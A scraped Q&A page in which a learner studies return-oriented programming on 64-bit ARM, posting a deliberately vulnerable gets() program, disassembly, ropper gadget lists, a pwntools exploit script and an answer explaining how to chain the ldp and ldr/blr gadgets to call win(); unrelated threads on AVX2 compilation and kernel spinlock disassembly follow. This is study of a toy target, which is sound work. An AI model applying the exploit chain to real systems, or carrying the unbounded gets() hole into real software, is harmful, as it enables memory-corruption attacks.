Return Oriented Programming on ARM (64-bit) - security

I am studying ROP (return-oriented programming) on 64-bit ARM, so I am testing a ROP vulnerability on my ARMv8 Cortex-A72 in order to understand how it works on AArch64.
I wrote a very simple vulnerable C program:
#include <stdio.h>
#include <string.h>
/* Target of the exercise: prints its message only when called with
 * magic == 0xdeadbeef. Nothing in this program calls it. */
void win(unsigned magic){
if(magic == 0xdeadbeef)
printf("I Should Never be Called!\n");
}
/* The vulnerable function: prints the address of an 80-byte stack buffer and
 * then fills it with gets(), which does no bounds checking. */
void vuln(){
char buffer[80];
printf("Buffer at:%p\n",buffer); /* show where the buffer lives on the stack */
gets(buffer); /* unbounded read: a line longer than the buffer writes past its end */
}
/* Entry point: does not use its arguments and only calls vuln(). */
int main(int argc, char **argv){
vuln();
}
In order to call the win function, I think the correct ROP chain is:
offset + pop {x0,pc} + correct_argument + win_address
This is the assembly code:
Dump of assembler code for function main:
0x00000055555557f8 <+0>: stp x29, x30, [sp, #-32]!
0x00000055555557fc <+4>: mov x29, sp
0x0000005555555800 <+8>: str w0, [sp, #28]
0x0000005555555804 <+12>: str x1, [sp, #16]
0x0000005555555808 <+16>: bl 0x55555557c8 <vuln>
0x000000555555580c <+20>: mov w0, #0x0 // #0
0x0000005555555810 <+24>: ldp x29, x30, [sp], #32
0x0000005555555814 <+28>: ret
Dump of assembler code for function vuln:
0x00000055555557c8 <+0>: stp x29, x30, [sp, #-96]!
0x00000055555557cc <+4>: mov x29, sp
0x00000055555557d0 <+8>: add x0, sp, #0x10
0x00000055555557d4 <+12>: mov x1, x0
0x00000055555557d8 <+16>: adrp x0, 0x5555555000
0x00000055555557dc <+20>: add x0, x0, #0x8c0
0x00000055555557e0 <+24>: bl 0x5555555680 <printf#plt>
0x00000055555557e4 <+28>: add x0, sp, #0x10
0x00000055555557e8 <+32>: bl 0x5555555690 <gets#plt>
0x00000055555557ec <+36>: nop
0x00000055555557f0 <+40>: ldp x29, x30, [sp], #96
0x00000055555557f4 <+44>: ret
Dump of assembler code for function win:
0x00000055555557b4 <+0>: sub sp, sp, #0x10
0x00000055555557b8 <+4>: str w0, [sp, #12]
0x00000055555557bc <+8>: nop
0x00000055555557c0 <+12>: add sp, sp, #0x10
0x00000055555557c4 <+16>: ret
I disabled ASLR first. Then, using gdb, I identified the offset at which the pc gets overwritten: it is 96 bytes. The last 8 bytes of those 96 overwrite the saved link register (x30), so the pc will be loaded with that value on return. The next step is to find the right gadget. Since I am working on ARMv8 and win() takes one argument, I am looking for a pop {x0, pc} gadget to build my ROP chain. I used ropper to search for gadgets; this is the output of the ropper command:
0x00000000000007c0: add sp, sp, #0x10; ret;
0x00000000000007e4: add x0, sp, #0x10; bl #0x690; nop; ldp x29, x30, [sp], #0x60; ret;
0x0000000000000648: add x16, x16, #0; br x17;
0x0000000000000668: add x16, x16, #0x10; br x17;
0x0000000000000678: add x16, x16, #0x18; br x17;
0x0000000000000688: add x16, x16, #0x20; br x17;
0x0000000000000698: add x16, x16, #0x28; br x17;
0x000000000000062c: add x16, x16, #0xff8; br x17;
0x0000000000000658: add x16, x16, #8; br x17;
0x0000000000000870: add x19, x19, #1; mov x1, x23; mov w0, w22; blr x3;
0x00000000000006d8: adrp x0, #0x10000; ldr x0, [x0, #0xfc8]; cbz x0, #0x6e8; b #0x660; ret;
0x0000000000000708: adrp x1, #0x10000; ldr x1, [x1, #0xfb8]; cbz x1, #0x71c; mov x16, x1; br x16;
0x0000000000000708: adrp x1, #0x10000; ldr x1, [x1, #0xfb8]; cbz x1, #0x71c; mov x16, x1; br x16; ret;
0x0000000000000624: adrp x16, #0x10000; ldr x17, [x16, #0xff8]; add x16, x16, #0xff8; br x17;
0x0000000000000660: adrp x16, #0x11000; ldr x17, [x16, #0x10]; add x16, x16, #0x10; br x17;
0x0000000000000670: adrp x16, #0x11000; ldr x17, [x16, #0x18]; add x16, x16, #0x18; br x17;
0x0000000000000680: adrp x16, #0x11000; ldr x17, [x16, #0x20]; add x16, x16, #0x20; br x17;
0x0000000000000690: adrp x16, #0x11000; ldr x17, [x16, #0x28]; add x16, x16, #0x28; br x17;
0x0000000000000650: adrp x16, #0x11000; ldr x17, [x16, #8]; add x16, x16, #8; br x17;
0x0000000000000640: adrp x16, #0x11000; ldr x17, [x16]; add x16, x16, #0; br x17;
0x0000000000000744: adrp x2, #0x10000; ldr x2, [x2, #0xfe0]; cbz x2, #0x758; mov x16, x2; br x16;
0x0000000000000744: adrp x2, #0x10000; ldr x2, [x2, #0xfe0]; cbz x2, #0x758; mov x16, x2; br x16; ret;
0x00000000000006e4: b #0x660; ret;
0x00000000000007b0: b #0x720; sub sp, sp, #0x10; str w0, [sp, #0xc]; nop; add sp, sp, #0x10; ret;
0x0000000000000704: b.eq #0x71c; adrp x1, #0x10000; ldr x1, [x1, #0xfb8]; cbz x1, #0x71c; mov x16, x1; br x16;
0x0000000000000884: b.ne #0x868; ldp x19, x20, [sp, #0x10]; ldp x21, x22, [sp, #0x20]; ldp x23, x24, [sp, #0x30]; ldp x29, x30, [sp], #0x40; ret;
0x00000000000006d4: bl #0x670; adrp x0, #0x10000; ldr x0, [x0, #0xfc8]; cbz x0, #0x6e8; b #0x660; ret;
0x00000000000007e0: bl #0x680; add x0, sp, #0x10; bl #0x690; nop; ldp x29, x30, [sp], #0x60; ret;
0x00000000000007e8: bl #0x690; nop; ldp x29, x30, [sp], #0x60; ret;
0x0000000000000610: bl #0x6d8; ldp x29, x30, [sp], #0x10; ret;
0x0000000000000790: bl #0x6f0; movz w0, #0x1; strb w0, [x19, #0x40]; ldr x19, [sp, #0x10]; ldp x29, x30, [sp], #0x20; ret;
0x0000000000000808: bl #0x7c8; movz w0, #0; ldp x29, x30, [sp], #0x20; ret;
0x000000000000087c: blr x3;
0x0000000000000718: br x16;
0x0000000000000718: br x16; ret;
0x0000000000000630: br x17;
0x00000000000006e0: cbz x0, #0x6e8; b #0x660; ret;
0x0000000000000710: cbz x1, #0x71c; mov x16, x1; br x16;
0x0000000000000710: cbz x1, #0x71c; mov x16, x1; br x16; ret;
0x0000000000000740: cbz x1, #0x758; adrp x2, #0x10000; ldr x2, [x2, #0xfe0]; cbz x2, #0x758; mov x16, x2; br x16;
0x000000000000074c: cbz x2, #0x758; mov x16, x2; br x16;
0x000000000000074c: cbz x2, #0x758; mov x16, x2; br x16; ret;
0x0000000000000888: ldp x19, x20, [sp, #0x10]; ldp x21, x22, [sp, #0x20]; ldp x23, x24, [sp, #0x30]; ldp x29, x30, [sp], #0x40; ret;
0x000000000000088c: ldp x21, x22, [sp, #0x20]; ldp x23, x24, [sp, #0x30]; ldp x29, x30, [sp], #0x40; ret;
0x0000000000000890: ldp x23, x24, [sp, #0x30]; ldp x29, x30, [sp], #0x40; ret;
0x0000000000000614: ldp x29, x30, [sp], #0x10; ret;
0x00000000000007a0: ldp x29, x30, [sp], #0x20; ret;
0x0000000000000894: ldp x29, x30, [sp], #0x40; ret;
0x00000000000007f0: ldp x29, x30, [sp], #0x60; ret;
0x00000000000006dc: ldr x0, [x0, #0xfc8]; cbz x0, #0x6e8; b #0x660; ret;
0x000000000000070c: ldr x1, [x1, #0xfb8]; cbz x1, #0x71c; mov x16, x1; br x16;
0x000000000000070c: ldr x1, [x1, #0xfb8]; cbz x1, #0x71c; mov x16, x1; br x16; ret;
0x0000000000000664: ldr x17, [x16, #0x10]; add x16, x16, #0x10; br x17;
0x0000000000000674: ldr x17, [x16, #0x18]; add x16, x16, #0x18; br x17;
0x0000000000000684: ldr x17, [x16, #0x20]; add x16, x16, #0x20; br x17;
0x0000000000000694: ldr x17, [x16, #0x28]; add x16, x16, #0x28; br x17;
0x0000000000000628: ldr x17, [x16, #0xff8]; add x16, x16, #0xff8; br x17;
0x0000000000000654: ldr x17, [x16, #8]; add x16, x16, #8; br x17;
0x0000000000000644: ldr x17, [x16]; add x16, x16, #0; br x17;
0x000000000000079c: ldr x19, [sp, #0x10]; ldp x29, x30, [sp], #0x20; ret;
0x0000000000000748: ldr x2, [x2, #0xfe0]; cbz x2, #0x758; mov x16, x2; br x16;
0x0000000000000748: ldr x2, [x2, #0xfe0]; cbz x2, #0x758; mov x16, x2; br x16; ret;
0x0000000000000868: ldr x3, [x21, x19, lsl #3]; mov x2, x24; add x19, x19, #1; mov x1, x23; mov w0, w22; blr x3;
0x0000000000000878: mov w0, w22; blr x3;
0x0000000000000874: mov x1, x23; mov w0, w22; blr x3;
0x0000000000000714: mov x16, x1; br x16;
0x0000000000000714: mov x16, x1; br x16; ret;
0x0000000000000750: mov x16, x2; br x16;
0x0000000000000750: mov x16, x2; br x16; ret;
0x000000000000086c: mov x2, x24; add x19, x19, #1; mov x1, x23; mov w0, w22; blr x3;
0x000000000000060c: mov x29, sp; bl #0x6d8; ldp x29, x30, [sp], #0x10; ret;
0x00000000000008a8: mov x29, sp; ldp x29, x30, [sp], #0x10; ret;
0x000000000000080c: movz w0, #0; ldp x29, x30, [sp], #0x20; ret;
0x0000000000000794: movz w0, #0x1; strb w0, [x19, #0x40]; ldr x19, [sp, #0x10]; ldp x29, x30, [sp], #0x20; ret;
0x0000000000000620: stp x16, x30, [sp, #-0x10]!; adrp x16, #0x10000; ldr x17, [x16, #0xff8]; add x16, x16, #0xff8; br x17;
0x0000000000000608: stp x29, x30, [sp, #-0x10]!; mov x29, sp; bl #0x6d8; ldp x29, x30, [sp], #0x10; ret;
0x00000000000008a4: stp x29, x30, [sp, #-0x10]!; mov x29, sp; ldp x29, x30, [sp], #0x10; ret;
0x0000000000000800: str w0, [sp, #0x1c]; str x1, [sp, #0x10]; bl #0x7c8; movz w0, #0; ldp x29, x30, [sp], #0x20; ret;
0x00000000000007b8: str w0, [sp, #0xc]; nop; add sp, sp, #0x10; ret;
0x0000000000000804: str x1, [sp, #0x10]; bl #0x7c8; movz w0, #0; ldp x29, x30, [sp], #0x20; ret;
0x0000000000000798: strb w0, [x19, #0x40]; ldr x19, [sp, #0x10]; ldp x29, x30, [sp], #0x20; ret;
0x00000000000007b4: sub sp, sp, #0x10; str w0, [sp, #0xc]; nop; add sp, sp, #0x10; ret;
0x00000000000007bc: nop; add sp, sp, #0x10; ret;
0x000000000000063c: nop; adrp x16, #0x11000; ldr x17, [x16]; add x16, x16, #0; br x17;
0x00000000000007ec: nop; ldp x29, x30, [sp], #0x60; ret;
0x0000000000000638: nop; nop; adrp x16, #0x11000; ldr x17, [x16]; add x16, x16, #0; br x17;
0x000000000000089c: nop; ret;
0x0000000000000618: ret;
As you can see, there are no gadgets like pop {x0, pc}. However, according to the ARMv8 cheat sheet, ldp x29, x30, [sp], #0x60 pops x29 and x30 from the stack, so we can basically treat ldp as a pop instruction. But again, there is no gadget that pops the x0 register from the stack.
So my question is: how can I build the ROP chain from the gadgets that ropper found?
Please help me understand it. Thank you.
My exploit:
# pwntools script: builds an overflowing input line for ./badcode, sends it,
# prints the first line the process outputs and then goes interactive.
from pwn import *
#gadget
# NOTE(review): confirm that this really is win's entry address in the binary being run.
win = p64(0x000000555555580c)
# NOTE(review): 0x8f8 and 0x8d8 are the addresses exactly as ropper lists them, i.e.
# relative to the ELF's link-time layout (first LOAD segment at 0x0). They are not
# run-time addresses; the load address of the mapping has to be added to them.
gadget_ldp = p64(0x00000000000008f8) #ldp x19, x20, [sp, #0x10]; ldp x21, x22, [sp, #0x20]; ldp x23, x24, [sp, #0x30]; ldp x29, x30, [sp], #0x40; ret;
gadget_ldr = p64(0x00000000000008d8) # ldr x3, [x21, x19, lsl #3]; mov x2, x24; add x19, x19, #1; mov x1, x23; mov w0, w22; blr x3;
magic = p64(0xdeadbeef) # value win() compares its argument against
# NOTE(review): meant to end up in x21, so it must be an address where a pointer to
# win is stored; check it against the "Buffer at:" line the program prints.
buf = p64(0x7ffffff000)
#payload
# 56 + 8 + 24 = 88 bytes precede gadget_ldp, which therefore occupies payload bytes 88..95.
payload = b'\x90'*56;
payload += win;
payload += b'\x90'*24; #offset
payload += gadget_ldp;
# NOTE(review): gadget_ldp reads x29/x30 from [sp] and x19..x24 from [sp, #0x10] onwards;
# verify in gdb that the values below actually sit at those offsets from sp when it runs.
payload += b'\x00'*8; #x19 must be zero (it is the index in ldr x3, [x21, x19, lsl #3])
payload += b'\x90'*8; # ldp register x20
payload += buf; #ldp register x21
payload += magic; #ldp register x22
payload += b'\x90'*8; #ldp register x23
payload += b'\x90'*8; #ldp register x24
payload += gadget_ldr;
#make connection to the binary and send payload
conn = process('./badcode')
conn.sendline(payload)
print(conn.recvline())
conn.interactive()

With the gadget at 0x0888 we can load all of x19-x24 from the stack and return, so we can set all their values arbitrarily and go on.
0x0878 has mov w0, w22, which is nice, but then the branch is to x3 which we don't yet control.
But back up a few instructions and look at the 0x0868 gadget. Notable for us is:
ldr x3, [x21, x19, lsl #3]
//...
mov w0, w22
blr x3
So if in our previous step, we loaded x21 with some address where a pointer to win can be found (maybe a place on the stack that we've set), and set x19 to zero, then we get win in x3. And likewise if in our previous step we loaded x22 with 0xdeadbeef, then we get it in w0 here. So we should be able to branch to win with w0 set as desired.

Related

Can't get vectorclass library to compile to AVX2 instructions in MSVC2019

I have tried my best to get the vectorclass library to generate AVX2 instructions, but can't get it to.
I'm using MSVC2019. Here are the compile options:
/permissive- /ifcOutput "x64\Release" /GS /Qpar /GL /W3 /Gy /Zc:wchar_t /I"D:\Tools\vectorclass" /I"D:\Tools\libzmq/include" /I"D:\Tools\boost\boost_1_79_0" /Zi /Gm- /O2 /Ob2 /sdl /Fd"x64\Release\vc142.pdb" /Zc:inline /D "__AVX2__" /D "ZMQ_STATIC" /D "FILE_INPUT" /D "NDEBUG" /D "WIN32" /D "_CRT_SECURE_NO_WARNINGS" /D "_CONSOLE" /D "_UNICODE" /D "UNICODE" /errorReport:prompt /WX- /Zc:forScope /std:c17 /arch:AVX2 /Gd /Oi /MT /std:c++17 /FC /Fa"x64\Release" /EHsc /nologo /Fo"x64\Release" /Ot /Fp"x64\Release\RtnLink_MSVC.pch" /diagnostics:column
In addition, I've tried to force it with the macro definitions __AVX2__ and INSTRSET, but no luck.
#define INSTRSET (8)
#define __AVX2__
#pragma warning(disable : 4984) //warning C4984: 'if constexpr' is a C++17 language extension
#include "vectorclass.h"
// Runs two loops over the same trip count: one using the vectorclass Vec8ui
// wrapper and one using raw AVX2 intrinsics, so the generated code can be compared.
// Returns the vectorclass result; result2 is computed but never returned.
size_t test(size_t size) {
Vec8ui incr(8); // NOTE(review): never used below
Vec8ui accum(0, 1, 2, 3, 4, 5, 6, 7);
for (size_t i = 8; i < size; i += 8) {
accum = accum + accum; // NOTE(review): adds accum to itself, whereas the intrinsics loop adds incr2
}
size_t result = horizontal_max(accum);
// Same loop shape written directly with intrinsics.
const __m256i incr2 = _mm256_set1_epi32(8);
__m256i accum2 = _mm256_setr_epi32(0, 1, 2, 3, 4, 5, 6, 7);
for (size_t i = 8; i < size; i += 8) {
accum2 = _mm256_add_epi32(accum2, incr2);
}
// Spill the vector to a 32-byte-aligned array and take the maximum with scalar code.
__declspec(align(32)) int32_t values_array[8];
_mm256_store_si256((__m256i*)values_array, accum2);
size_t result2 = values_array[0];
for (int i = 1; i < 8; i++) {
if (values_array[i] > result2) { // NOTE(review): compares an int32_t with a size_t
result2 = values_array[i];
}
}
return result;
}
This compiles to the following 2 loops:
Using vectorclass (no AVX2 instructions):
Vec8ui incr(8);
00007FF7A9BC2E5A mov edx,8
00007FF7A9BC2E5F lea rcx,[incr]
00007FF7A9BC2E63 call Vec8ui::Vec8ui (07FF7A9B58BFEh)
Vec8ui accum(0, 1, 2, 3, 4, 5, 6, 7);
00007FF7A9BC2E68 mov dword ptr [rsp+40h],7
00007FF7A9BC2E70 mov dword ptr [rsp+38h],6
00007FF7A9BC2E78 mov dword ptr [rsp+30h],5
00007FF7A9BC2E80 mov dword ptr [rsp+28h],4
00007FF7A9BC2E88 mov dword ptr [rsp+20h],3
00007FF7A9BC2E90 mov r9d,2
00007FF7A9BC2E96 mov r8d,1
00007FF7A9BC2E9C xor edx,edx
00007FF7A9BC2E9E lea rcx,[accum]
00007FF7A9BC2EA2 call Vec8ui::Vec8ui (07FF7A9B54B99h)
for (size_t i = 8; i < size; i += 8) {
00007FF7A9BC2EA7 mov qword ptr [rbp+98h],8
00007FF7A9BC2EB2 jmp __$EncStackInitStart+0A2h (07FF7A9BC2EC6h)
00007FF7A9BC2EB4 mov rax,qword ptr [rbp+98h]
00007FF7A9BC2EBB add rax,8
00007FF7A9BC2EBF mov qword ptr [rbp+98h],rax
00007FF7A9BC2EC6 mov rax,qword ptr [size]
00007FF7A9BC2ECD cmp qword ptr [rbp+98h],rax
00007FF7A9BC2ED4 jae __$EncStackInitStart+10Fh (07FF7A9BC2F33h)
accum = accum + accum;
00007FF7A9BC2ED6 lea rax,[rbp+4C0h]
00007FF7A9BC2EDD lea rcx,[accum]
00007FF7A9BC2EE1 mov rdi,rax
00007FF7A9BC2EE4 mov rsi,rcx
00007FF7A9BC2EE7 mov ecx,20h
00007FF7A9BC2EEC rep movs byte ptr [rdi],byte ptr [rsi]
00007FF7A9BC2EEE lea rax,[rbp+480h]
00007FF7A9BC2EF5 lea rcx,[accum]
00007FF7A9BC2EF9 mov rdi,rax
00007FF7A9BC2EFC mov rsi,rcx
00007FF7A9BC2EFF mov ecx,20h
00007FF7A9BC2F04 rep movs byte ptr [rdi],byte ptr [rsi]
00007FF7A9BC2F06 lea r8,[rbp+4C0h]
00007FF7A9BC2F0D lea rdx,[rbp+480h]
00007FF7A9BC2F14 lea rcx,[rbp+380h]
00007FF7A9BC2F1B call operator+ (07FF7A9BC29C0h)
00007FF7A9BC2F20 lea rcx,[accum]
00007FF7A9BC2F24 mov rdi,rcx
00007FF7A9BC2F27 mov rsi,rax
00007FF7A9BC2F2A mov ecx,20h
00007FF7A9BC2F2F rep movs byte ptr [rdi],byte ptr [rsi]
}
00007FF7A9BC2F31 jmp __$EncStackInitStart+90h (07FF7A9BC2EB4h)
size_t result = horizontal_max(accum);
00007FF7A9BC2F33 lea rax,[rbp+500h]
00007FF7A9BC2F3A lea rcx,[accum]
00007FF7A9BC2F3E mov rdi,rax
00007FF7A9BC2F41 mov rsi,rcx
00007FF7A9BC2F44 mov ecx,20h
00007FF7A9BC2F49 rep movs byte ptr [rdi],byte ptr [rsi]
00007FF7A9BC2F4B lea rcx,[rbp+500h]
00007FF7A9BC2F52 call horizontal_max<Vec8ui> (07FF7A9B54FB3h)
00007FF7A9BC2F57 mov eax,eax
00007FF7A9BC2F59 mov qword ptr [result],rax
Using intrinsics (we get AVX2 instructions):
const __m256i incr2 = _mm256_set1_epi32(8);
00007FF7A9BC2F60 vmovdqu ymm0,ymmword ptr [__ymm#0000000800000008000000080000000800000008000000080000000800000008 (07FF7A9E87940h)]
00007FF7A9BC2F68 vmovdqu ymmword ptr [rbp+3C0h],ymm0
00007FF7A9BC2F70 vmovdqu ymm0,ymmword ptr [rbp+3C0h]
00007FF7A9BC2F78 vmovdqu ymmword ptr [incr2],ymm0
__m256i accum2 = _mm256_setr_epi32(0, 1, 2, 3, 4, 5, 6, 7);
00007FF7A9BC2F80 vmovdqu ymm0,ymmword ptr [__ymm#0000000700000006000000050000000400000003000000020000000100000000 (07FF7A9E87900h)]
00007FF7A9BC2F88 vmovdqu ymmword ptr [rbp+400h],ymm0
00007FF7A9BC2F90 vmovdqu ymm0,ymmword ptr [rbp+400h]
00007FF7A9BC2F98 vmovdqu ymmword ptr [accum2],ymm0
for (size_t i = 8; i < size; i += 8) {
00007FF7A9BC2FA0 mov qword ptr [rbp+158h],8
00007FF7A9BC2FAB jmp __$EncStackInitStart+19Bh (07FF7A9BC2FBFh)
00007FF7A9BC2FAD mov rax,qword ptr [rbp+158h]
00007FF7A9BC2FB4 add rax,8
00007FF7A9BC2FB8 mov qword ptr [rbp+158h],rax
00007FF7A9BC2FBF mov rax,qword ptr [size]
00007FF7A9BC2FC6 cmp qword ptr [rbp+158h],rax
00007FF7A9BC2FCD jae __$EncStackInitStart+1D5h (07FF7A9BC2FF9h)
accum2 = _mm256_add_epi32(accum2, incr2);
00007FF7A9BC2FCF vmovdqu ymm0,ymmword ptr [accum2]
00007FF7A9BC2FD7 vpaddd ymm0,ymm0,ymmword ptr [incr2]
00007FF7A9BC2FDF vmovdqu ymmword ptr [rbp+440h],ymm0
00007FF7A9BC2FE7 vmovdqu ymm0,ymmword ptr [rbp+440h]
00007FF7A9BC2FEF vmovdqu ymmword ptr [accum2],ymm0
}
00007FF7A9BC2FF7 jmp __$EncStackInitStart+189h (07FF7A9BC2FADh)
__declspec(align(32)) int32_t values_array[8];
_mm256_store_si256((__m256i*)values_array, accum2);
00007FF7A9BC2FF9 vmovdqu ymm0,ymmword ptr [accum2]
00007FF7A9BC3001 vmovdqa ymmword ptr [values_array],ymm0
size_t result2 = values_array[0];
00007FF7A9BC3009 mov eax,4
00007FF7A9BC300E imul rax,rax,0
00007FF7A9BC3012 movsxd rax,dword ptr values_array[rax]
00007FF7A9BC301A mov qword ptr [result2],rax
for (int i = 1; i < 8; i++) {
00007FF7A9BC3021 mov dword ptr [rbp+1D4h],1
00007FF7A9BC302B jmp __$EncStackInitStart+217h (07FF7A9BC303Bh)
00007FF7A9BC302D mov eax,dword ptr [rbp+1D4h]
00007FF7A9BC3033 inc eax
00007FF7A9BC3035 mov dword ptr [rbp+1D4h],eax
00007FF7A9BC303B cmp dword ptr [rbp+1D4h],8
00007FF7A9BC3042 jge __$EncStackInitStart+250h (07FF7A9BC3074h)
if (values_array[i] > result2) {
00007FF7A9BC3044 movsxd rax,dword ptr [rbp+1D4h]
00007FF7A9BC304B movsxd rax,dword ptr values_array[rax*4]
00007FF7A9BC3053 cmp rax,qword ptr [result2]
00007FF7A9BC305A jbe __$EncStackInitStart+24Eh (07FF7A9BC3072h)
result2 = values_array[i];
00007FF7A9BC305C movsxd rax,dword ptr [rbp+1D4h]
00007FF7A9BC3063 movsxd rax,dword ptr values_array[rax*4]
00007FF7A9BC306B mov qword ptr [result2],rax

What's meaning of ".inst" in arm assembly instruction

Kernel version : 4.14.199
The spin_lock assembly instructions in crash is
crash_arm64> dis _raw_spin_lock -x
0xffffff8008c41e90 <_raw_spin_lock>: stp x29, x30, [sp,#-32]!
0xffffff8008c41e94 <_raw_spin_lock+0x4>: str x19, [sp,#16]
0xffffff8008c41e98 <_raw_spin_lock+0x8>: mov x29, sp
0xffffff8008c41e9c <_raw_spin_lock+0xc>: mov x19, x0
0xffffff8008c41ea0 <_raw_spin_lock+0x10>: nop
0xffffff8008c41ea4 <_raw_spin_lock+0x14>: mov w0, #0x1 // #1
0xffffff8008c41ea8 <_raw_spin_lock+0x18>: bl 0xffffff80080f399c <preempt_count_add>
0xffffff8008c41eac <_raw_spin_lock+0x1c>: mov w10, #0x10000 // #65536
0xffffff8008c41eb0 <_raw_spin_lock+0x20>: .inst 0xb8aa0268 ; undefined
0xffffff8008c41eb4 <_raw_spin_lock+0x24>: nop
0xffffff8008c41eb8 <_raw_spin_lock+0x28>: nop
0xffffff8008c41ebc <_raw_spin_lock+0x2c>: nop
0xffffff8008c41ec0 <_raw_spin_lock+0x30>: eor w9, w8, w8, ror #16
0xffffff8008c41ec4 <_raw_spin_lock+0x34>: cbz w9, 0xffffff8008c41edc <_raw_spin_lock+0x4c>
0xffffff8008c41ec8 <_raw_spin_lock+0x38>: sevl
0xffffff8008c41ecc <_raw_spin_lock+0x3c>: wfe
0xffffff8008c41ed0 <_raw_spin_lock+0x40>: ldaxrh w10, [x19]
0xffffff8008c41ed4 <_raw_spin_lock+0x44>: eor w9, w10, w8, lsr #16
0xffffff8008c41ed8 <_raw_spin_lock+0x48>: cbnz w9, 0xffffff8008c41ecc <_raw_spin_lock+0x3c>
0xffffff8008c41edc <_raw_spin_lock+0x4c>: ldr x19, [sp,#16]
0xffffff8008c41ee0 <_raw_spin_lock+0x50>: ldp x29, x30, [sp],#32
0xffffff8008c41ee4 <_raw_spin_lock+0x54>: ret
What's the meaning of .inst instructions ?
0xffffff8008c41eb0 <_raw_spin_lock+0x20>: .inst 0xb8aa0268 ; undefined
I found the function definition in arch/arm64/include/asm/spinlock.h.
/*
 * Acquire a ticket spinlock.
 *
 * The "take the next ticket" step is passed to ARM64_LSE_ATOMIC_INSN as two
 * alternative instruction sequences: an LL/SC retry loop (prfm, ldaxr, add,
 * stxr, cbnz) and an LSE form (mov, ldadda, followed by three nops).
 * After that, the code compares the two 16-bit halves of the value it
 * read; if they differ it waits with wfe, re-reading lock->owner until it
 * equals the upper half of that value.
 */
static inline void arch_spin_lock(arch_spinlock_t *lock)
{
unsigned int tmp;
arch_spinlock_t lockval, newval;
asm volatile(
/* Atomically increment the next ticket. */
ARM64_LSE_ATOMIC_INSN(
/* LL/SC */
" prfm pstl1strm, %3\n"
"1: ldaxr %w0, %3\n"
" add %w1, %w0, %w5\n"
" stxr %w2, %w1, %3\n"
" cbnz %w2, 1b\n",
/* LSE atomics */
" mov %w2, %w5\n"
" ldadda %w2, %w0, %3\n"
__nops(3)
)
/* Did we get the lock? */
" eor %w1, %w0, %w0, ror #16\n"
" cbz %w1, 3f\n"
/*
 * No: spin on the owner. Send a local event to avoid missing an
 * unlock before the exclusive load.
 */
" sevl\n"
"2: wfe\n"
" ldaxrh %w2, %4\n"
" eor %w1, %w2, %w0, lsr #16\n"
" cbnz %w1, 2b\n"
/* We got the lock. Critical section starts here. */
"3:"
/* Operands: %0 = lockval, %1 = newval, %2 = tmp, %3 = *lock (read/write memory) */
: "=&r" (lockval), "=&r" (newval), "=&r" (tmp), "+Q" (*lock)
/* %4 = lock->owner (memory), %5 = immediate 1 << TICKET_SHIFT */
: "Q" (lock->owner), "I" (1 << TICKET_SHIFT)
: "memory");
}
In my opinion, the .inst 0xb8aa0268 should correspond to "ldadda %w2, %w0, %3\n".
Why does the disassembly shown by crash differ from the source code?

Find out where rop gadgets are actually loaded in memory using Ropper

I am studying ROP on Arm64; I posted my earlier thread here: Return Oriented Programming on ARM (64-bit).
However, a new, separate issue about choosing ROP gadgets has arisen, which warrants a new thread. To sum up, I am studying ROP vulnerabilities on 64-bit ARM and I am trying to test one using a very simple C program (attached to the previous thread).
I am using the ropper tool to search for gadgets to build my ROP chain. But when I overwrite the pc with the address of the gadget, I get this within gdb:
[!] Cannot disassemble from $PC
[!] Cannot access memory at address 0x8f8
stopped 0x8f8 in ?? ()
I overwrote the pc with the gadget address 0x00000000000008f8, but that cannot be the address at which the gadget is actually loaded in memory.
Here the list of rop gadgets that i have got by using ropper:
0x0000000000000858: add x0, sp, #0x10; bl #0x6e0; nop; ldp x29, x30, [sp], #0x60; ret;
0x0000000000000828: add x0, x0, #0x930; bl #0x6c0; nop; ldp x29, x30, [sp], #0x20; ret;
0x0000000000000688: add x16, x16, #0; br x17;
0x00000000000006a8: add x16, x16, #0x10; br x17;
0x00000000000006b8: add x16, x16, #0x18; br x17;
0x00000000000006c8: add x16, x16, #0x20; br x17;
0x00000000000006d8: add x16, x16, #0x28; br x17;
0x00000000000006e8: add x16, x16, #0x30; br x17;
0x000000000000066c: add x16, x16, #0xff8; br x17;
0x0000000000000698: add x16, x16, #8; br x17;
0x00000000000008e0: add x19, x19, #1; mov x1, x23; mov w0, w22; blr x3;
0x0000000000000824: adrp x0, #0; add x0, x0, #0x930; bl #0x6c0; nop; ldp x29, x30, [sp], #0x20; ret;
0x0000000000000728: adrp x0, #0x10000; ldr x0, [x0, #0xfc8]; cbz x0, #0x738; b #0x6a0; ret;
0x0000000000000758: adrp x1, #0x10000; ldr x1, [x1, #0xfb8]; cbz x1, #0x76c; mov x16, x1; br x16;
0x0000000000000758: adrp x1, #0x10000; ldr x1, [x1, #0xfb8]; cbz x1, #0x76c; mov x16, x1; br x16; ret;
0x0000000000000664: adrp x16, #0x10000; ldr x17, [x16, #0xff8]; add x16, x16, #0xff8; br x17;
0x00000000000006a0: adrp x16, #0x11000; ldr x17, [x16, #0x10]; add x16, x16, #0x10; br x17;
0x00000000000006b0: adrp x16, #0x11000; ldr x17, [x16, #0x18]; add x16, x16, #0x18; br x17;
0x00000000000006c0: adrp x16, #0x11000; ldr x17, [x16, #0x20]; add x16, x16, #0x20; br x17;
0x00000000000006d0: adrp x16, #0x11000; ldr x17, [x16, #0x28]; add x16, x16, #0x28; br x17;
0x00000000000006e0: adrp x16, #0x11000; ldr x17, [x16, #0x30]; add x16, x16, #0x30; br x17;
0x0000000000000690: adrp x16, #0x11000; ldr x17, [x16, #8]; add x16, x16, #8; br x17;
0x0000000000000680: adrp x16, #0x11000; ldr x17, [x16]; add x16, x16, #0; br x17;
0x0000000000000794: adrp x2, #0x10000; ldr x2, [x2, #0xfe0]; cbz x2, #0x7a8; mov x16, x2; br x16;
0x0000000000000794: adrp x2, #0x10000; ldr x2, [x2, #0xfe0]; cbz x2, #0x7a8; mov x16, x2; br x16; ret;
0x0000000000000734: b #0x6a0; ret;
0x0000000000000754: b.eq #0x76c; adrp x1, #0x10000; ldr x1, [x1, #0xfb8]; cbz x1, #0x76c; mov x16, x1; br x16;
0x00000000000008f4: b.ne #0x8d8; ldp x19, x20, [sp, #0x10]; ldp x21, x22, [sp, #0x20]; ldp x23, x24, [sp, #0x30]; ldp x29, x30, [sp], #0x40; ret;
0x0000000000000724: bl #0x6b0; adrp x0, #0x10000; ldr x0, [x0, #0xfc8]; cbz x0, #0x738; b #0x6a0; ret;
0x000000000000082c: bl #0x6c0; nop; ldp x29, x30, [sp], #0x20; ret;
0x0000000000000854: bl #0x6d0; add x0, sp, #0x10; bl #0x6e0; nop; ldp x29, x30, [sp], #0x60; ret;
0x000000000000085c: bl #0x6e0; nop; ldp x29, x30, [sp], #0x60; ret;
